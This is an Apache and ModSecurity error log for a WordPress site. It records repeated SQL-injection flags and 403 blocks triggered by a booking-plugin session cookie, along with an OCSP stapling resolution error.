[Mon May 11 18:35:32.205762 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFUw-Qm4vhlWBPlMjnKAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:32.313106 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFVA-Qm4vhlWBPlMjnKQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:32.313389 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFVA-Qm4vhlWBPlMjnKQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:32.676340 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFVA-Qm4vhlWBPlMjnKQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:33.072071 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFVQ-Qm4vhlWBPlMjnKwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:33.072379 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFVQ-Qm4vhlWBPlMjnKwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:33.669570 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFVQ-Qm4vhlWBPlMjnKwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:34.033137 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFVg-Qm4vhlWBPlMjnLAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:34.033432 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFVg-Qm4vhlWBPlMjnLAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:34.663324 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFVg-Qm4vhlWBPlMjnLAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:34.944296 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFVg-Qm4vhlWBPlMjnLgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:34.944570 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFVg-Qm4vhlWBPlMjnLgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:35.595605 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFVg-Qm4vhlWBPlMjnLgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:36.281733 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFWA-Qm4vhlWBPlMjnMAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:36.282009 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFWA-Qm4vhlWBPlMjnMAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:36.870001 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFWA-Qm4vhlWBPlMjnMAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:36.977240 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFWA-Qm4vhlWBPlMjnMQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:36.977528 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFWA-Qm4vhlWBPlMjnMQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:37.549247 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFWA-Qm4vhlWBPlMjnMQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:37.687787 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFWQ-Qm4vhlWBPlMjnMgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:37.688068 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFWQ-Qm4vhlWBPlMjnMgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:38.054597 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFWQ-Qm4vhlWBPlMjnMgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:38.704624 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFWg-Qm4vhlWBPlMjnNAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:38.704907 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFWg-Qm4vhlWBPlMjnNAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:39.307446 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFWg-Qm4vhlWBPlMjnNAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:39.728051 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFWw-Qm4vhlWBPlMjnNgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:39.728338 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFWw-Qm4vhlWBPlMjnNgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:40.326956 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFWw-Qm4vhlWBPlMjnNgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:40.707256 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFXA-Qm4vhlWBPlMjnOAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:40.707589 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFXA-Qm4vhlWBPlMjnOAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:41.310218 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFXA-Qm4vhlWBPlMjnOAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:42.137301 2026] [ssl:error] [pid 1416109:tid 1416142] (EAI 2)Name or service not known: [client 34.243.60.90:50522] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:35:42.137531 2026] [ssl:error] [pid 1416109:tid 1416142] AH01941: stapling_renew_response: responder error
[Mon May 11 18:35:42.231311 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFXg-Qm4vhlWBPlMjnOgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:42.231603 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFXg-Qm4vhlWBPlMjnOgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:42.814454 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFXg-Qm4vhlWBPlMjnOgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:42.916370 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFXg-Qm4vhlWBPlMjnPAAAAAc"], referer: https://rentparadise.fr/wp-login.php
